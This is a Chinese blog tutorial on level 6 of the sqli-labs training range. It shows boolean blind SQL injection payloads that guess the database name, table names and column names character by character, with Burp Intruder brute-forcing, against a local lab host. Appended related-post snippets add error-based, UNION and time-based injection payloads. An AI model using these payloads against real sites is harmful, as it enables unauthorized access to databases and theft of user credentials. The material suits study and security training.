Sqli-lab靶场教程第六关(布尔盲注)

最新推荐文章于 2026-01-07 17:44:51 发布
原创 最新推荐文章于 2026-01-07 17:44:51 发布 · 864 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库

免责声明

本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。

作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。

在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。

本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。

第六关

这一关可以使用报错注入、布尔盲注、时间盲注,报错注入第五关用过了具体参考上期文章sqli-lab靶场教程(1-5关),第六关这里我们使用布尔盲注。

判断闭合类型

?id=1\

发现闭合类型为字符型双引号闭合

判断数据库名的长度

?id=1" and length(database())>=8--+

这里判断的方法是使用and的机制让and两边都为true才会回显网页输出的内容,这里我们使用手工加bp爆破

经过判断发现数据库名长度为8

这里我们可以使用substr截取字符进行ascii编码然后判断大小来确定是哪个字符

?id=1" and ascii(substr(database(),1,1))>=115--+

经过判断发现数据库第一个字母ascii的编码为115,通过对照ascii码表发现115为小写s,所以数据库第一个字母为s,以此类推剩下的字符

判断第一个表单的第一个字符

?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>=101--+

对照ascii表发现第一个表单的第一个字母为e

接下来我们使用bp爆破其他的字符,这里我使用的是kali上的bp,先创建一个36位字母的字典

判断表单名长度

?id=1" and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))>=29--+

长度为29

访问网页,并写入payload

http://192.168.153.39:8081/Less-6/?id=1" and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='str'--+

打开bp代理进行抓包,并将包发送给攻击模块

在攻击模块中设置攻击节点和攻击模式

设置完成是这样的

设置payload,第一个攻击节点设置为数字型,数据库长度为8,所以我们设置长度为8步长为1

设置第二个攻击节点,加上我们创建的字典

爆破完成,根据位数进行排序,这里没有第七位的原因是第七位是逗号,而字典中没有逗号,所以没有显示,第七位之前就是第一个表单名emails,要想爆破后续名单名字就需要补全数字和字典

判断列名长度

?id=1" and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))>=20--+

爆破列名

?id=1" and substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='str'--+

爆破用户名和密码与上面步骤一样。

himyly
关注
sqli-labtips 第五~第六
weixin_44089266的博客
04-06 1025
** 第五第六为报错型sql注入,此处只对第五进行详解** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-5/?id=1 观察到页面回显如下 重新构造payload h...
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 3039
这里使用sqli-labs第六来学习报错注入,当然第五也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli-labs系列——第六
茶寂的博客
01-15 2815
less6 这个本质上跟第五相同都是使用报错注入,这一使用的是双引号闭合 还是使用updatexml()这个函数 ?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库名: ?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表名: ?id=1" union select updatexml(1,con
基于Sqli-Labs靶场的SQL注入-6~10
Joker
11-25 3654
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sqli注入--利用information_schema配合双查询报错注入
weixin_30779691的博客
01-18 403
目录 sqli-labs 5、6双查询报错注入通 0x01 获取目标库名 0x02 获取库中表的数量 0x03 获取库中表名 0x04 获取目标表中的列数 0x05 获取目标表的列名 0x06 从列中获取用户名 0x07 获取对应的...
sqli-labs靶场第八布尔盲注
wanggonghanfei的博客
10-03 2073
Bool盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;或者为真时返回正常页面,为假时跳转到错误页面等。不需要返回结果,仅判断语句是否正常执行,在这种情况下我们可以使用布尔盲注
sqli-labs靶场8布尔盲注
qq_46527080的博客
12-12 2744
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs靶场第7-10
foxfoxfoxfoxxxx的博客
07-09 1243
摘要:本文介绍了sqli-labs靶场在线版7-10的SQL注入方法。第7使用'))闭合布尔盲注,通过length()、ascii()和substr()函数逐步猜解数据库信息;第8是单引号闭合布尔盲注;第9采用单引号闭合时间盲注,利用if()和sleep()函数根据响应延迟判断条件真假;第10为双引号闭合时间盲注。每都详细演示了从猜解数据库长度、名称到表名、列名和数据的完整过程,并建议使用sqlmap等自动化工具。
sqli-labs靶场11-17(POST型)
bunengyongzho666的博客
05-05 1051
uname=admin' and if((substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='s'),sleep(5),1)#爆字段。uname=admin&passwd=123' and updatexml(1,concat(0x7e,(database()),0x7e),1)#——爆数据库
sqli-lab靶场(1-21
somnus981的博客
07-03 1608
HTTP文件头注入是后台开发人员为了验证客户端(比如常用的Cookie验证等)或者通过HTTP Header头信息获取客户端的一些信息(比如User-AgentAccept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Header的注入漏洞。
sqli-labs-master靶场
09-21
靶场提供了一系列的练习环境,每个练习都设计了不同的难度级别,从简单的错误信息泄露到复杂的基于布尔逻辑和时间延迟的盲注技术。sqli-labs-master靶场的目标是让使用者能够在一个安全的环境中对SQL注入的各种...
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1480
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
怎么优化慢SQL
chenxuefeng_accp的专栏
01-06 646
摘要:本文系统介绍了MySQL慢SQL优化方法论,涵盖慢SQL定位、常见问题分析及优化策略。通过开启慢查询日志和使用EXPLAIN分析执行计划,可快速识别性能瓶颈。优化措施包括:合理设计索引(避免失效)、解决排序和临时表问题、优化JOIN查询、处理大分页性能问题等。高级优化手段涉及SQL重写、读写分离、分库分表和缓存技术。这些方法不仅适用于InnoDB引擎,部分也适用于其他系型数据库,是提升数据库性能的实用指南。
AI应用(5)- RAG知识库理解
最新发布
小糖豆
01-07 592
知识库其实是自己建立的库,并不是让模型记住,而是把文档变成可以检索的库,模型在这个过程中只是读证据,综合多端证据,按照规则输出而已。
使用TwinCAT为半导体设备设计数据功能的技术方案
ponygame的博客
01-05 1413
摘要:本文提出基于TwinCAT平台的半导体设备数据统计系统方案,采用分层架构实现实时数据采集与处理。实时层(PLC)负责1-10ms级数据采集、预处理和基础统计计算,符合SEMI标准要求;非实时层(.NET)实现数据分析、存储和WPF/WinForms界面展示。系统通过ADS协议实现高效通信,支持EtherCAT等现场总线接入,提供实时监控、历史趋势、统计报表等功能。方案涉及TwinCAT编程、C#开发、数据库设计等多技术领域,具有实时性强、模块化程度高、符合行业标准等特点,但需掌握IEC61131-3、
HTML:SQLite本地网页查看
aimersong69的博客
01-06 193
本文介绍了一个基于Web的SQLite本地查看器工具,无需安装即可在浏览器中查看SQLite数据库。该工具采用HTML5技术实现,支持拖拽上传.db/.sqlite文件,提供表结构浏览、数据查询、自定义SQL执行和数据导出为CSV等功能。通过sql.js库实现前端SQL解析,保证数据在本地处理,避免云端传输的安全风险。界面采用现代化设计,包含响应式布局、表格展示和交互式操作,适合开发人员快速查看和分析SQLite数据库内容。
TDengine JAVA 语言连接器入门指南
TDengine(老段)专注时序数据库领域
01-04 1614
JAVA 语言连接器
浅谈Qt中的QSql模块整体设计
红军不怕远征难,万水千山只等闲
01-01 1247
Qt的QSql模块是Qt框架提供的数据库抽象层,旨在屏蔽不同数据库(如SQLite、MySQL等)的底层API差异,提供统一的操作接口。其核心设计包括三层架构:应用层调用API执行数据库操作,抽象接口层定义统一接口(如QSqlDatabase、QSqlQuery),驱动适配层通过插件机制适配具体数据库。QSql支持SQL执行、参数绑定、事务控制等功能,并与Qt的MVC组件深度整合。模块采用工厂模式、适配器模式等设计模式,确保扩展性和跨平台兼容性。开发者可通过自定义驱动和模型扩展功能,但需注意线程安全和性能优
sql基础操作
醉卧考场君莫笑
01-03 975
本文介绍了SQL基础操作指令,包括数据库和数据表的基本操作。主要内容涵盖:数据库的查看、创建、打开和删除;数据类型的分类(数值型、字符型、日期时间型等);数据表的创建、修改和删除方法;以及数据插入操作。文章通过具体语法示例和练习题目,帮助读者掌握SQL基础指令的使用,如创建表结构、修改字段、导入数据等基本数据库操作技能。
sqli-lab靶场
02-20
### 于SQL注入实验室(sqli-lab)的解题思路 #### 实验室概述 SQLi-Labs 是一个用于学习和实践 SQL 注入漏洞利用技巧的开源项目。该项目提供了一系列具有不同复杂度级别的 Web 应用程序,旨在帮助安全研究人员理解和掌握各种类型的 SQL 注入攻击方法[^1]。 #### 基本准备 在开始尝试破解 sqli-lab 的各个卡之前,确保已经安装并配置好了实验环境。通常情况下,可以通过 Docker 或者直接部署 PHP 和 MySQL 来运行这些练习实例。熟悉如何启动服务以及访问目标网站是非常重要的前提条件[^2]。 #### 解决方案概览 对于每一个挑战级别,解决过程大致可以分为以下几个方面: - **理解应用程序逻辑**:仔细阅读页面上的提示信息,了解输入字段的作用范围及其背后可能存在的查询语句结构。 - **识别潜在入口点**:通过测试不同的参数组合来发现哪些地方可能存在未被充分验证过的用户输入路径。 - **构建有效载荷(Payload)**:基于前面两步获得的知识,精心设计能够绕过防护机制并执行恶意命令的数据包内容。 下面给出一些具体场景下的通用策略和技术要点说明: ##### Level 1 - Error Based Injection 当遇到错误消息泄露型注入时,可利用单引号 `'` 导致语法异常进而触发数据库报错的方式来进行探测。例如,在登录表单中提交如下用户名: ```sql ' OR '1'='1 ``` 如果返回了不同于正常情况的结果,则表明存在该类别的弱点[^3]。 ##### Union Query Attack 联合查询是一种常见的高级技术,它允许攻击者将额外的选择子附加到原始请求之后从而获取更多有用的信息片段。比如构造这样的 URL 参数字符串: ```http ?id=1 UNION SELECT null, version(), database() ``` 这会使得服务器响应除了原本预期之外还包含了当前使用的 DBMS 版本号及默认库名等敏感资料[^4]。 请注意以上仅作为理论指导而非详尽的操作指南;实际操作过程中还需要考虑诸多因素如编码方式转换、字符集差异处理等等细节问题。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值